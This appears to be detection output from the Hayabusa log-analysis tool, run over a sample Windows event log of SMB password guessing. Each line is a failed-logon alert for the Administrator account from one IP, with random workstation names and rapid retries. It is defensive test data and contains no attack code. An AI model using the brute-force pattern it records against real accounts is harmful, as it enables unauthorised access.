+2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: 
